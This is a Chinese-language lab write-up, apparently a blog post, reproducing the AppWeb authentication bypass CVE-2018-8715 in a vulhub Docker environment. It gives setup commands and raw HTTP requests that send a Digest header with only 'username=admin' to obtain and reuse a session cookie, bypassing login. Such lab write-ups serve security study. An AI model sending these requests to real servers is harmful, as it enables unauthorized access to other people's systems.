0
点赞
收藏
分享

微信扫一扫

[ vulhub漏洞复现篇 ] AppWeb认证绕过漏洞(CVE-2018-8715)

文章目录

一、漏洞编号

CVE-2018-8715

二、漏洞描述

- basic 传统HTTP基础认证
- digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
- form 表单认证

三、影响范围

7.0.3之前的版本

四、指纹信息

WWW-Authenticate: Digest

五、环境搭建

1、进入 CVE-2018-8715环境

cd vulhub/appweb/CVE-2018-8715

在这里插入图片描述

2、启动 CVE-2018-8715环境

docker-compose up -d

在这里插入图片描述

3、查看 CVE-2018-8715环境

docker-compose ps

在这里插入图片描述

4、访问 CVE-2018-8715环境

http://192.168.13.131:8080/

在这里插入图片描述

5、查看 CVE-2018-8715提示信息

cat README.md 

在这里插入图片描述

6、关闭 CVE-2018-8715环境

docker-compose down

在这里插入图片描述

六、漏洞复现

1、环境

2、利用条件

3、构造Authorization头获取session

GET / HTTP/1.1
Host: 192.168.13.131:8080
Authorization: Digest username=admin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1

在这里插入图片描述

4、设置session绕过认证

GET / HTTP/1.1
Host: 192.168.13.131:8080
Authorization: Digest username=admin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
-http-session-=2::http.session::6519ed0833aa0a4e852a1733e669af15
Authorization: Digest username=admin
Content-Length: 18

username=admin

在这里插入图片描述
在这里插入图片描述

5、浏览器设置session绕过认证访问

http://192.168.13.131:8080/

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

七、火狐安装EditThisCookie2插件

1、进入扩展

在这里插入图片描述

2、搜索EditThisCookie2插件

在这里插入图片描述

3、添加EditThisCookie2插件

在这里插入图片描述

4、确认添加EditThisCookie2插件

在这里插入图片描述

5、安装完成

在这里插入图片描述

八、漏洞原理

https://cloud.tencent.com/developer/article/1740499

九、修复方案

十、相关资源

docker 搭建 vulhub 靶场环境:

https://blog.csdn.net/qq_51577576/article/details/125048165
举报

相关推荐

0 条评论